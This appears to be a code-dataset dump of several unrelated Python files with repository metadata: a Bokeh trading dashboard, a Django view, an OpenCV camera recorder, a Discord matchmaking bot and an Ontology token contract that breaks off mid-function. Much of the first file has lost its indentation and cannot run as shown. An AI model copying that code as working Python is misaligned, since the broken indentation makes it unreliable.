stratBox = Select(title="Alpha",value='WMA',options=['WMA','BuyAndHold','RSI'],width=20)
buyPriceBox = Select(title="Buy Price",value='close',options=['open','close'])
buyQtyBox = TextInput(title="Buy Quantity", value='1', height=hh)
buyCondBox = TextInput(title="Buy Condition", value='', height=hh)
sellPriceBox = Select(title="Sell Price",value='close',options=['open','close'])
sellQtyBox = TextInput(title="Sell Quantity", value='1', height=hh)
sellCondBox = TextInput(title="Sell Condition", value='', height=hh)
submit2 = Button(label='Submit',width=20,height=hh)
#errBox = Div(text="",width=ww,height=hh//2,style={'overflow-y':'scroll','height':'150px'})
errBox = Div(text="",width=ww,height=hh//2)
lineSrc = ColumnDataSource(data={'date':[],'close':[]})
sellSrc = ColumnDataSource(data={'x':[],'y':[]})
buySrc = ColumnDataSource(data={'x':[],'y':[]})
alphaSrc = ColumnDataSource(data={'date':[],'alpha':[]})
retPlot = figure(plot_width=250,plot_height=100,x_axis_type='datetime', y_axis_label='price')
#retPlot.extra_y_ranges['alpha'] = Range1d(start=-10, end=100)
#retPlot.add_layout(LinearAxis(y_range_name='alpha', axis_label='alpha'), 'right')
p1 = Paragraph(text="A table below shows performance of trading algorithms for chosen symbols.",width=ww,height=hh//2)
p2 = Paragraph(text="In this section you can customize parameters of a chosen strategy. First choose a strategy from the dropdown, then change parameters in the input forms and save. The strategy will show up as \"Custom\" in the summary table. Note that the Save button is only available to logged-in, registered users.", width=int(1.2*ww),height=hh//2)
p3 = Paragraph(text="The graph below displays the price of the chosen stock symbol (tan line) along with the alpha of the chosen strategy (in orange). Buy trades are shown as blue upward triangles, and sell trades as red downward triangles.", width=int(1.2*ww),height=hh//2)
emptyResult = dict(name=[],pnl=[],cnt=[])
summaryTableSource = ColumnDataSource(data=emptyResult)
summaryColumns = [
TableColumn(field='name',title='Name',width=120),
TableColumn(field='pnl',title='P&L',formatter=NumberFormatter(format='0.00%',text_align='right'),width=80),
TableColumn(field='cnt',title='Count',formatter=NumberFormatter(format='0,0',text_align='right'),width=80)
]
summaryTbl = DataTable(source=summaryTableSource,columns=summaryColumns,width=ww,height=200)
account = None
save1 = Button(label='Save',width=20,height=hh)
class Args:
def __init__(self,args=None):
log.debug('init Args')
self.args = args
# actions
def lookupRecs1():
sym = symBox.value
errBox.text = 'Done'
return lookupRecs(sym,"NA")
def lookupRecs2():
sym = symBox.value
customStrat = {'alphaName':stratBox.value, 'buyCondition': buyCondBox.value, 'buyPrice': buyPriceBox.value, 'buyQuantity': buyQtyBox.value, 'sellCondition': sellCondBox.value, 'sellPrice': sellPriceBox.value, 'sellQuantity': sellQtyBox.value }
customStratText = '[STRATEGY],'+','.join(['{}={}'.format(kk,vv) for kk,vv in customStrat.items()])
log.warn(customStratText)
errBox.text = html.escape(customStratText)
#return lookupRecs(sym,"NA")
return lookupRecs(sym,customStratText)
def lookupRecs(sym=None, custom=None):
global retPlot,lineSrc,sellSrc,buySrc,alphaSrc,portX
summaryTableSource.data = emptyResult
lineSrc.data = dict(date=[],close=[])
dt1 = datePick1.value
dt2 = datePick2.value
Dates,df = [],None
if dt1: Dates.append(dt1)
if dt2: Dates.append(dt2)
# create portfolio
args = Args()
args.view = None; args.force = True
args.backtest = custom
args.dates = Dates
args.Syms = args.Sym = symBox.value
if account: args.account = account
portX = PNLPortfolios(args)
    portDF = portX.getPortDF()
    if portDF is None or not isinstance(portDF, pd.DataFrame) or portDF.empty:
        errBox.text = "Cannot find any results, try again..."
        return
    iStrat = portDF.index[portDF['name']!='Custom'][0] # get 1st match other than Custom
    if custom == "NA":
        stratName1 = portDF.iloc[iStrat]['name']
        stratBox.value = stratName1
    else: stratName1 = stratBox.value
    Sym1 = portDF.iloc[iStrat]['sym']
    strat1 = portX.getStrategy(name=stratName1)
    buyCondBox.value = strat1.buyCondition
    sellCondBox.value = strat1.sellCondition
    df = portX.getDF(Sym=Sym1)
    if df is None or not isinstance(df, pd.DataFrame) or df.empty:
        errBox.text = "Cannot find any graph data, try again..."
        return
    df['alpha'] = strat1.getAlpha()
tDF = portX.getTrades(Sym=Sym1)
DT1 = DT(dt1.year,dt1.month,dt1.day) - timedelta(days=2)
DT2 = DT(dt2.year,dt2.month,dt2.day) + timedelta(days=1)
subDF = df.loc[(df['date'] > DT1.date()) & (df['date'] <= DT2.date())]
tradeDF = tDF.loc[(tDF['date'] > DT1.date()) & (tDF['date'] <= DT2.date()) & (tDF['quantity']!=0)]
minI,maxI = None,None
closes = subDF['close'].tolist()
if len(closes): minI,maxI = min(closes),max(closes)
lineSrc.data = subDF[['date','close']].to_dict('list')
alphaSrc.data = subDF[['date','alpha']].to_dict('list')
lastDate = tradeDF.date.max()
idx_cond = tradeDF.groupby("stratName").apply(lambda x,DT1: x.where((x.date==lastDate)&(x.quantity!=0)&(x.action.replace('force_close','').replace(',','')!='')).last_valid_index(),DT1=lastDate)
if not idx_cond.empty:
actDF = tradeDF.loc[tradeDF.index.intersection(idx_cond)]
actDF['now']='-'
actDF.loc[actDF.quantity>0,'now'] = 'up'
actDF.loc[actDF.quantity<0,'now'] = 'down'
actDF.loc[actDF.stratName=='BuyAndHold','now'] = 'hold'
actDF = actDF.rename(columns={'stratName':'name'})
portDF = pd.merge(portDF, actDF[['name','now']], left_on=['name'], right_on=['name'], how='left')
portDF[['now']] = portDF[['now']].fillna('-')
else:
portDF['now'] = '-'
summaryTbl.columns = []
portDF = portDF[['name','pnl','sharpe','sym','days','cnt','now']]
portDF = portDF.rename(columns={'pnl':'return'})
    for col1 in portDF.columns:
if portDF[col1].dtype==np.float64:
if col1=='return':
summaryTbl.columns.append(TableColumn(field=col1, title=col1, formatter=NumberFormatter(format='0[.]00%',text_align='right')))
else:
summaryTbl.columns.append(TableColumn(field=col1, title=col1, formatter=NumberFormatter(format='0[.]00',text_align='right')))
else:
summaryTbl.columns.append(TableColumn(field=col1, title=col1))
summaryTableSource.data = portDF.to_dict('list')
sellData = tradeDF.loc[tradeDF['quantity']<0]
buyData = tradeDF.loc[tradeDF['quantity']>0]
    if stratName1 not in ['_BuyAndHold_']:
sellData = sellData.loc[sellData['stratName']==stratName1]
buyData = buyData.loc[buyData['stratName']==stratName1]
sellSrc.data = dict(x=sellData['date'].tolist(),y=sellData['price'].tolist())
buySrc.data = dict(x=buyData['date'].tolist(),y=buyData['price'].tolist())
retPlot.line(x='date',y='close',line_color='tan',source=lineSrc,name='bench')
retPlot.triangle(x='x',y='y',size=7,fill_color='lightskyblue',source=buySrc,name='trades')
retPlot.inverted_triangle(x='x',y='y',size=7,fill_color='red',source=sellSrc,name='trades')
aMin,aMax = subDF.alpha.min(),subDF.alpha.max()
if False and aMin and aMax and not math.isnan(aMin):
retPlot.extra_y_ranges['alpha'].start = aMin
retPlot.extra_y_ranges['alpha'].end = aMax
retPlot.line(x='date',y='alpha',line_color='orange',y_range_name='alpha',source=alphaSrc,name='alpha')
retPlot.x_range.start,retPlot.x_range.end=DT1.timestamp()*1000,DT2.timestamp()*1000
def saveStrat():
if not account:
errBox.text = 'Cannot save without account info'
return None
else:
errBox.text = 'Saving custom strategy to '+ account
customStrat = {'alphaName':stratBox.value, 'buyCondition': buyCondBox.value, 'buyPrice': buyPriceBox.value, 'buyQuantity': buyQtyBox.value, 'sellCondition': sellCondBox.value, 'sellPrice': sellPriceBox.value, 'sellQuantity': sellQtyBox.value }
customStratText = '[STRATEGY],'+','.join(['{}={}'.format(kk,vv) for kk,vv in customStrat.items()])
log.warn('saving ' + customStratText)
errBox.text = 'Saving to '+ account + ' ' + html.escape(customStratText)
portX.setStrategy(account)
def populateParams(attr, old, new):
strat1 = portX.getStrategy(name=stratBox.value)
buyCondBox.value = strat1.buyCondition
buyPriceBox.value = strat1.buyPrice
buyQtyBox.value = strat1.buyQuantity
sellCondBox.value = strat1.sellCondition
sellPriceBox.value = strat1.sellPrice
sellQtyBox.value = strat1.sellQuantity
lookupRecs2()
sym_overlay = row(symBox, datePick1, datePick2, column(Div(),submit1,height=hh),height=hh)
#strat_overlay = row(stratBox, column(Div(),submit2,height=hh),height=hh)
buy_overlay = row(buyCondBox,buyPriceBox,buyQtyBox,stratBox)
sell_overlay = row(sellCondBox,sellPriceBox,sellQtyBox,column(Div(),save1,height=hh))
#err_overlay = row(column(row(save1, errBox)))
err_overlay = row(errBox)
# assemble the page
def assemble_page():
curdoc().clear()
l1 = layout([ \
[sym_overlay], \
[p1], \
[summaryTbl], \
[p2], \
[buy_overlay], [sell_overlay], \
[err_overlay], \
[p3], \
[retPlot], \
],sizing_mode='scale_width')
#],sizing_mode='stretch_both')
if not account: save1.disabled=True
else: save1.disabled=False
curdoc().add_root(l1)
curdoc().title = "P&L.AI"
if os.environ.get('DJANGO_DEVELOPMENT'): dj_URL = "http://127.0.0.1:8000/"
else: dj_URL = "http://pnlai-env.eba-b6bihwb7.us-west-2.elasticbeanstalk.com/"
curdoc().template_variables["logout"] = dj_URL + 'logout/'
curdoc().template_variables["login"] = dj_URL + 'pnlaiapp/user_login/'
curdoc().template_variables["register"] = dj_URL + 'pnlaiapp/register/'
def getTop(Str):
DF = None
tday = DT.now().strftime('%Y-%m-%d')
t_f1,t_fs = None,glob.glob('data/store/yf/{}_*.pkl'.format(Str))
if t_fs and len(t_fs)>0: t_f1 = max(t_fs, key=os.path.getctime)
if t_f1 and os.path.isfile(t_f1):
dtStr1 = t_f1.split('/store/yf/')[-1].split('.pkl')[0].split('_')[-1]
dt1 = (datetime.datetime.strptime(dtStr1,'%Y-%m-%d')).date()
if dt1 > (DT.today()-timedelta(days=30)).date():
DF = pd.read_pickle(t_f1)
return DF
def getSyms():
SymLs = []
gDF = getTop('gainers')
if isinstance(gDF, pd.DataFrame): SymLs.append(gDF.iloc[0]['Symbol'])
lDF = getTop('losers')
if isinstance(lDF, pd.DataFrame): SymLs.append(lDF.iloc[0]['Symbol'])
return SymLs
# assign actions
def main():
global account
# check if there is a list of initial syms
SymLs = []
args_g = curdoc().session_context.request.arguments
try: SymLs = [aa.decode("utf-8") for aa in args_g.get('Sym')]
except: SymLs = getSyms()
try: account = args_g.get('account')[0].decode("utf-8")
except: account = None
if SymLs: syms = ','.join(SymLs)
else: syms = "BTCUSD"
errBox.text = 'Starting lookup'
datePick1.value=(DT.now()-timedelta(days=nDaysAgo)).strftime('%Y-%m-%d')
datePick2.value=DT.now().strftime('%Y-%m-%d')
symBox.value = syms
lookupRecs(syms,"NA")
submit1.on_click(lookupRecs1)
#submit2.on_click(lookupRecs2)
save1.on_click(saveStrat)
stratBox.on_change('value', populateParams)
assemble_page()
errBox.text = 'Completed lookup'
if __name__ == '__main__':
if log.DEBUG>=log.getLogger().getEffectiveLevel():
backtest="[STRATEGY],alphaName=WMA,buyCondition=lastClose<alpha and close>alpha,buyPrice=close,buyQuantity=1,sellCondition=lastClose>alpha and close<alpha,sellPrice=close,sellQuantity=1"
#backtest = "NA"
datePick1.value="2020-12-01";datePick2.value="2021-04-01"; lookupRecs("BTCUSD",backtest)
account='test'; saveStrat()
else:
main()
|
[
"varturas@gmail.com"
] |
varturas@gmail.com
|
476179284ddb1b7ce2743515ae21f53e49da1c46
|
5134cb3c4ba10eab149c98ea5fb58dc09b519422
|
/resumeroot/resumeroot/views.py
|
a274a58a021cea5bfe3da380dc8cc4effccb45a1
|
[] |
no_license
|
prakharg47/expresscv
|
3175de8696c8fb0df4e90d5671c1663d55340863
|
08600e870c59fb6298804e2ad0a06994808ec539
|
refs/heads/master
| 2021-06-18T20:10:51.600113
| 2019-07-03T07:43:18
| 2019-07-03T07:43:18
| 194,356,452
| 1
| 1
| null | 2021-06-10T21:37:19
| 2019-06-29T02:40:03
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 233
|
py
|
from django.shortcuts import render
# Create your views here.
def home(request):
return render(request, 'resumeroot/home.html', context=None)
|
[
"prakhar.gupta@loylty.com"
] |
prakhar.gupta@loylty.com
|
a03ca7da4b114eb56f5900f813eb72c312b68436
|
6cc4608a0f414a592e45057c2694287a9abd5d0b
|
/Camera_Test/saveVideo.py
|
f3fae712c08cbbfc166c259804a1711621fae1d4
|
[] |
no_license
|
reaf-tamu/REAF-RoboSub-2018
|
b496d989b141d6be94002b85840e8bd91f193967
|
a96317f7792e80e1b1ae71faf89af45946a56107
|
refs/heads/master
| 2020-03-23T06:17:42.782195
| 2018-07-31T05:26:13
| 2018-07-31T05:26:13
| 141,201,550
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,332
|
py
|
import numpy as np
import cv2
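# Record three camera feeds at once (apparently the down, front-right and
# front-left cameras, judging by the output file names) to separate AVI files.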
cap = cv2.VideoCapture(0)
cap2 = cv2.VideoCapture(1)
cap3 = cv2.VideoCapture(2)
# Define the codec and create VideoWriter object
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('outputDowny.avi',fourcc, 20.0, (640,480))
fourcc2 = cv2.VideoWriter_fourcc(*'XVID')
out2 = cv2.VideoWriter('outputFRy.avi',fourcc2, 20.0, (640,480))
fourcc3 = cv2.VideoWriter_fourcc(*'XVID')
out3 = cv2.VideoWriter('outputFLy.avi',fourcc3, 20.0, (640,480))
while(cap.isOpened()):
ret, frame = cap.read()
ret2, frame2 = cap2.read()
ret3, frame3 = cap3.read()
if ret==True:
out.write(frame)
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
if ret2==True:
out2.write(frame2)
cv2.imshow('frame2',frame2)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
if ret3==True:
out3.write(frame3)
cv2.imshow('frame3',frame3)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
# Release everything if job is finished
cap.release()
cap2.release()
cap3.release()
out.release()
out2.release()
out3.release()
cv2.destroyAllWindows()
|
[
"hannahhut@tamu.edu"
] |
hannahhut@tamu.edu
|
1bc180cb4e0fa860acc4402a221464d973d7a86c
|
2f4137631026626bc758e826643628be9fcac58f
|
/bot/main.py
|
d86681c6d3ca503893510393a1631fc523574a18
|
[] |
no_license
|
Erebusaur/elo_bot
|
fe41928bc01b5f10f8560d46de5d72b2ed50110d
|
b228ca8d090fea7a4a4d461609ab356aa27684ab
|
refs/heads/master
| 2023-02-23T20:27:20.106382
| 2021-01-25T17:48:58
| 2021-01-25T17:48:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,628
|
py
|
import discord
import itertools
import math
import os
import requests
import time
import trueskill
from discord.ext import commands
from dotenv import load_dotenv
from state import State
from api import Api
from game import Game
from player import Player
intents = discord.Intents.default()
intents.members = True
bot = commands.Bot(command_prefix='?', intents=intents)
@bot.event
async def on_ready():
pass
def balance(queue):
size = len(queue) // 2
best_score = 0
best_teams = None
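    # Pin the first queued player to team 1 (queue[:1]) so mirrored splits are
    # not enumerated twice; trueskill.quality scores how evenly matched the two
    # candidate teams are, and the highest-quality split is kept.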
for team1 in itertools.combinations(queue[1:], size - 1):
team1 = queue[:1] + list(team1)
team2 = [x for x in queue if x not in team1]
team1_rating = list(map(lambda id: state.get_rating(id), team1))
team2_rating = list(map(lambda id: state.get_rating(id), team2))
score = trueskill.quality([team1_rating, team2_rating])
if score > best_score:
best_score = score
best_teams = (team1, team2)
return best_teams
async def start_game(ctx):
if ctx.channel.id not in state.allowed_channels:
return
queue = list(state.queue)
state.queue = set()
team1, team2 = balance(queue)
state.api.create_game(Game(team1, team2))
mentions = ""
description = "Team 1:\n"
for player_id in team1:
member = ctx.guild.get_member(player_id)
name = member.mention
# rating = state.get_conservative_rating(player_id)
# description += "{} {}\n".format(name, rating)
description += f"{name}\n"
mentions += "{} ".format(name)
description += "\nTeam 2:\n"
for player_id in team2:
member = ctx.guild.get_member(player_id)
name = member.mention
# rating = state.get_conservative_rating(player_id)
# description += "{} {}\n".format(name, rating)
description += f"{name}\n"
mentions += "{} ".format(name)
id = state.api.get_last_game().id
title = "Game #{} started".format(id)
embed = discord.Embed(title=title, description=description)
message = await ctx.send(mentions, embed=embed)
    for player_id in team1 + team2:
        try:
            member = ctx.guild.get_member(player_id)
            await member.send("Game started: {}".format(message.jump_url))
        except:
            pass
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def rebalance(ctx):
game = api.get_last_game()
if not game:
return
team1, team2 = balance(game.team1 + game.team2)
game.team1 = team1
game.team2 = team2
api.update_game(game)
title = "Game #{}".format(game.id)
description = "Team 1:\n"
for player_id in team1:
member = ctx.guild.get_member(player_id)
name = member.mention
# rating = state.get_conservative_rating(player_id)
# description += "{} {}\n".format(name, rating)
description += f"{name}\n"
description += "\nTeam 2:\n"
for player_id in team2:
member = ctx.guild.get_member(player_id)
name = member.mention
# rating = state.get_conservative_rating(player_id)
# description += "{} {}\n".format(name, rating)
description += f"{name}\n"
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
async def add_player(ctx, player: discord.User):
name = player.mention
try:
state.add_queue(player.id)
except KeyError:
await ctx.send(f"{name} is already in the queue.")
return
# rating = state.get_conservative_rating(player.id)
# title = "[{}/{}] {} ({}) joined the queue.".format(
# len(state.queue), 2 * state.team_size, name, rating)
title = "[{}/{}] {} joined the queue.".format(
len(state.queue), 2 * state.team_size, name)
embed = discord.Embed(description=title)
await ctx.send(embed=embed)
if len(state.queue) == 2 * state.team_size:
await start_game(ctx)
@bot.command(aliases=['j'])
async def join(ctx):
if ctx.channel.id not in state.allowed_channels:
return
if state.frozen:
await ctx.send("The queue is frozen.")
return
await add_player(ctx, ctx.author)
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def forcejoin(ctx, user: discord.User):
if ctx.channel.id not in state.allowed_channels:
return
await add_player(ctx, user)
async def remove_player(ctx, player: discord.User):
name = player.mention
try:
state.remove_queue(player.id)
except KeyError:
await ctx.send(f"{name} is not in the queue.")
return
# rating = state.get_conservative_rating(player.id)
# description = "[{}/{}] {} ({}) left the queue.".format(
# len(state.queue), 2 * state.team_size, name, rating)
description = "[{}/{}] {} left the queue.".format(
len(state.queue), 2 * state.team_size, name)
embed = discord.Embed(description=description)
await ctx.send(embed=embed)
if len(state.queue) == 2 * state.team_size:
await start_game(ctx)
@bot.command(aliases=['l'])
async def leave(ctx):
if ctx.channel.id not in state.allowed_channels:
return
if state.frozen:
await ctx.send("The queue is frozen.")
return
await remove_player(ctx, ctx.author)
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def forceremove(ctx, user: discord.User):
if ctx.channel.id not in state.allowed_channels:
return
await remove_player(ctx, user)
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def players(ctx, n: int):
if ctx.channel.id not in state.allowed_channels:
return
    if n < 1:
        await ctx.send("Players per team must be at least 1.")
        return
state.team_size = n
await ctx.send(f"Players per team set to {n}.")
if len(state.queue) == 2 * state.team_size:
await start_game(ctx)
@bot.command(aliases=['g'])
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def score(ctx, id: int, team: str):
if ctx.channel.id not in state.allowed_channels:
return
game = state.api.get_game_by_id(id)
if not game:
await ctx.send("This game does not exist.")
return
if team == '1':
result = '1'
elif team == '2':
result = '2'
elif team == 'draw':
result = 'D'
else:
await ctx.send("Score must be 1, 2 or draw.")
return
game.score = result
state.api.update_game(game)
state.update_players()
await ctx.send(f"Game {id} updated.")
@bot.command(aliases=['cancel'])
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def cancelgame(ctx, id: int):
if ctx.channel.id not in state.allowed_channels:
return
game = state.api.get_game_by_id(id)
if not game:
await ctx.send("This game does not exist.")
return
game.score = 'C'
state.api.update_game(game)
state.update_players()
@bot.command(aliases=['lb'])
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def leaderboard(ctx, page=1):
if ctx.channel.id not in state.allowed_channels:
return
players = list(
filter(lambda x: x[0], map(lambda x: (ctx.guild.get_member(x), state.get_rating(x)), state.players.keys())))
players = sorted(players, key=lambda x: -(x[1].mu - 2 * x[1].sigma))
pages = math.ceil(len(players) / 20)
if page > pages:
return
start = 20 * (page - 1)
description = ""
for (i, player) in enumerate(players[start:start+20], start + 1):
name = player[0]
rating = round(100 * (player[1].mu - 2 * player[1].sigma))
mu = round(100 * player[1].mu)
sigma = round(200 * player[1].sigma)
description += "{}: {} - **{}** ({} ± {})\n".format(
i, name.mention, rating, mu, sigma)
embed = discord.Embed(
title=f"Leaderboard ({page}/{pages})", description=description)
await ctx.send(embed=embed)
@bot.command(aliases=['q'])
async def queue(ctx):
if ctx.channel.id not in state.allowed_channels:
return
last_game = state.api.get_last_game()
if last_game:
id = last_game.id + 1
else:
id = 1
title = "Game #{} [{}/{}]".format(id, len(state.queue),
2 * state.team_size)
description = ""
for player_id in state.queue:
name = ctx.guild.get_member(player_id).mention
# rating = state.get_conservative_rating(player_id)
# description += "{} ({})\n".format(name, rating)
description += "{}\n".format(name)
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
async def _gameinfo(ctx, game: Game):
title = "Game #{}".format(game.id)
winner = "undecided"
if game.score == "1":
winner = "team 1"
elif game.score == "2":
winner = "team 2"
elif game.score == "D":
winner = "draw"
elif game.score == "C":
winner = "cancelled"
description = "{}\n\nWinner: {}\n\nTeam 1:".format(game.date[:-1], winner)
for player in game.team1:
name = "<@" + str(player) + ">"
description += "\n{}".format(name)
description += "\n\nTeam 2:"
for player in game.team2:
name = "<@" + str(player) + ">"
description += "\n{}".format(name)
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
@bot.command()
async def lastgame(ctx):
if ctx.channel.id not in state.allowed_channels:
return
game = state.api.get_last_game()
if not game:
await ctx.send("No game was played.")
return
await _gameinfo(ctx, game)
@bot.command()
async def gameinfo(ctx, id: int):
if ctx.channel.id not in state.allowed_channels:
return
game = state.api.get_game_by_id(id)
if not game:
await ctx.send("This game does not exist.")
return
await _gameinfo(ctx, game)
@bot.command()
# @commands.has_any_role('Scrim Organiser', 'Moderator')
async def info(ctx, user: discord.User = None):
if ctx.channel.id not in state.allowed_channels and not isinstance(ctx.channel, discord.channel.DMChannel):
return
if not user:
user = ctx.author
else:
try:
roles = list(map(lambda x: x.name, ctx.author.roles))
if not ('Scrim Organiser' in roles or 'Moderator' in roles):
return
except:
return
games = state.api.get_games(user.id)
wins = 0
losses = 0
draws = 0
for game in games:
if game.score == "1":
if user.id in game.team1:
wins += 1
else:
losses += 1
elif game.score == "2":
if user.id in game.team2:
wins += 1
else:
losses += 1
elif game.score == "D":
draws += 1
rating = state.get_rating(user.id)
mu = round(100 * rating.mu)
sigma = round(200 * rating.sigma)
rating = state.get_conservative_rating(user.id)
title = "{}'s stats".format(user.display_name)
description = "Rating: {} ({}±{})\n".format(
rating, mu, sigma)
description += f"Wins: {wins}\n"
description += f"Losses: {losses}\n"
description += f"Draws: {draws}\n"
description += "Games: {}\n".format(wins + losses + draws)
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
@bot.command()
async def gamelist(ctx, user: discord.User = None):
if ctx.channel.id not in state.allowed_channels:
return
if user:
title = "{}'s last games".format(user.display_name)
last_games = state.api.get_games(user.id)[-20:][::-1]
description = ""
for game in last_games:
result = "undecided"
if game.score == "1":
if user.id in game.team1:
result = "win"
else:
result = "loss"
elif game.score == "2":
if user.id in game.team2:
result = "win"
else:
result = "loss"
elif game.score == "D":
result = "draw"
elif game.score == "C":
result = "cancelled"
description += "Game #{}: {}\n".format(game.id, result)
else:
title = "Last games"
last_games = state.api.get_games()[-20:][::-1]
description = ""
for game in last_games:
result = "undecided"
if game.score == "1":
result = "team 1"
elif game.score == "2":
result = "team 2"
elif game.score == "D":
result = "draw"
elif game.score == "C":
result = "cancelled"
description += "Game #{}: {}\n".format(game.id, result)
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
@bot.command()
async def stats(ctx):
if ctx.channel.id not in state.allowed_channels:
return
games = state.api.get_games()
total_games = len(games)
draws = 0
cancelled = 0
ongoing = 0
for game in games:
if game.score == "C":
            cancelled += 1
elif game.score == "D":
draws += 1
elif not game.score:
ongoing += 1
title = "Stats"
description = "Total games: {}\n".format(total_games)
description += "Games played: {}\n".format(
total_games - cancelled - ongoing)
description += "Cancelled games: {}\n".format(cancelled)
description += "Undecided games: {}\n".format(ongoing)
# description += "Draws: {}\n".format(draws)
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def swap(ctx, user1: discord.User, user2: discord.User):
if ctx.channel.id not in state.allowed_channels:
return
game = state.api.get_last_game()
if user1.id in game.team1:
if user2.id in game.team1:
await ctx.send("These players are on the same team.")
return
elif user2.id in game.team2:
game.team1 = [x if x != user1.id else user2.id for x in game.team1]
game.team2 = [x if x != user2.id else user1.id for x in game.team2]
else:
game.team1 = [x if x != user1.id else user2.id for x in game.team1]
elif user1.id in game.team2:
if user2.id in game.team2:
await ctx.send("These players are on the same team.")
return
elif user2.id in game.team1:
game.team1 = [x if x != user2.id else user1.id for x in game.team1]
game.team2 = [x if x != user1.id else user2.id for x in game.team2]
else:
game.team2 = [x if x != user1.id else user2.id for x in game.team2]
else:
await ctx.send("{} is not playing.".format(user1.mention))
return
state.api.update_game(game)
await ctx.send("Players swapped.")
if game.score in ["1", "2", "D"]:
state.update_players()
@bot.command(aliases=['clear', 'clearq'])
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def clearqueue(ctx):
state.queue = set()
await ctx.send("Queue cleared.")
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def freeze(ctx):
state.frozen = True
await ctx.send("Queue frozen.")
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def unfreeze(ctx):
state.frozen = False
await ctx.send("Queue unfrozen.")
load_dotenv()
api = Api("http://localhost:5000")
state = State(api)
state.update_players()
bot.run(os.getenv('DISCORD_TOKEN'))
|
[
"lucas.fenart@protonmail.com"
] |
lucas.fenart@protonmail.com
|
f9648b4e207e988d51a49712c2adc8d36c8d6d5c
|
6c34c19aa9ca94751acc3bd9c6d0548838ccce2b
|
/AbstractDeck.py
|
9642961a1c451f4ee027c216c60dd00b4ccbfc55
|
[
"MIT"
] |
permissive
|
mleyfman/abstract-card-game
|
d2614fb7fb1447e7349ae135d481fc9af3d73317
|
5f50508da7413306747a4c4d36891604794a4aeb
|
refs/heads/master
| 2016-09-05T23:51:52.336762
| 2014-08-03T16:26:28
| 2014-08-03T16:26:28
| 22,243,009
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 572
|
py
|
from random import randint
class AbstractDeck:
"""Abstract class for shuffling and iterating over a collection of cards"""
    def __init__(self, cards=None):
        self.cards = cards if cards is not None else []
    def __len__(self):
        return len(self.cards)
def __iter__(self):
return iter(self.cards)
def shuffle(self):
"""Shuffles the deck with the Fisher-Yates shuffle"""
num_cards = len(self.cards)
for i in range(0, num_cards):
j = randint(i, num_cards - 1)
self.cards[i], self.cards[j] = self.cards[j], self.cards[i]
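# A minimal usage sketch (not part of the original module): any list works
# as the card pool.
if __name__ == "__main__":
    deck = AbstractDeck(cards=list(range(10)))
    deck.shuffle()
    print([card for card in deck])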
|
[
"mleyfman@me.com"
] |
mleyfman@me.com
|
f0e885af8f236263f6f0d54edcb919a801a52753
|
bc8e2bec970f67a8a0d1e0e2e8cbc83143503be3
|
/luckyMoon2/Lucky.py
|
97f3aee2c17a430f0cf04ab3ee0f211c1d7f2303
|
[] |
no_license
|
skyinglyh1/temporary-Moon
|
a7905361c69f9b54777e53e08a1ec1810859c8ff
|
d28b91267bec3f09c2e191283986aec469c1ffd8
|
refs/heads/master
| 2020-04-12T03:58:59.320725
| 2018-12-25T06:15:23
| 2018-12-25T06:15:23
| 162,281,188
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,036
|
py
|
"""
Lucky Contract
"""
from boa.interop.System.Storage import GetContext, Get, Put, Delete
from boa.interop.System.Runtime import Notify, CheckWitness
from boa.interop.System.Action import RegisterAction
from boa.builtins import concat, ToScriptHash
TransferEvent = RegisterAction("transfer", "from", "to", "amount")
ApprovalEvent = RegisterAction("approval", "owner", "spender", "amount")
ctx = GetContext()
NAME = 'LUCKY'
SYMBOL = 'LCY'
DECIMALS = 9
FACTOR = 1000000000
OWNER = ToScriptHash("AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p")
TOTAL_AMOUNT = 10000000000
BALANCE_PREFIX = bytearray(b'\x01')
APPROVE_PREFIX = b'\x02'
SUPPLY_KEY = 'TotalSupply'
def Main(operation, args):
"""
:param operation:
:param args:
:return:
"""
    # 'init' has to be invoked first after deploying the contract to store the necessary and important info in the blockchain
if operation == 'init':
return init()
if operation == 'name':
return name()
if operation == 'symbol':
return symbol()
if operation == 'decimals':
return decimals()
if operation == 'totalSupply':
return totalSupply()
if operation == 'balanceOf':
if len(args) != 1:
return False
acct = args[0]
return balanceOf(acct)
if operation == 'transfer':
if len(args) != 3:
return False
else:
from_acct = args[0]
to_acct = args[1]
amount = args[2]
return transfer(from_acct,to_acct,amount)
if operation == 'transferMulti':
return transferMulti(args)
if operation == 'transferFrom':
if len(args) != 4:
return False
spender = args[0]
from_acct = args[1]
to_acct = args[2]
amount = args[3]
return transferFrom(spender,from_acct,to_acct,amount)
if operation == 'approve':
if len(args) != 3:
return False
owner = args[0]
spender = args[1]
amount = args[2]
return approve(owner,spender,amount)
if operation == 'allowance':
if len(args) != 2:
return False
owner = args[0]
spender = args[1]
return allowance(owner,spender)
if operation == 'burn':
if len(args) != 2:
return False
acct = args[0]
amount = args[1]
return burn(acct, amount)
return False
def init():
"""
initialize the contract, put some important info into the storage in the blockchain
:return:
"""
if len(OWNER) != 20:
Notify(["Owner illegal!"])
return False
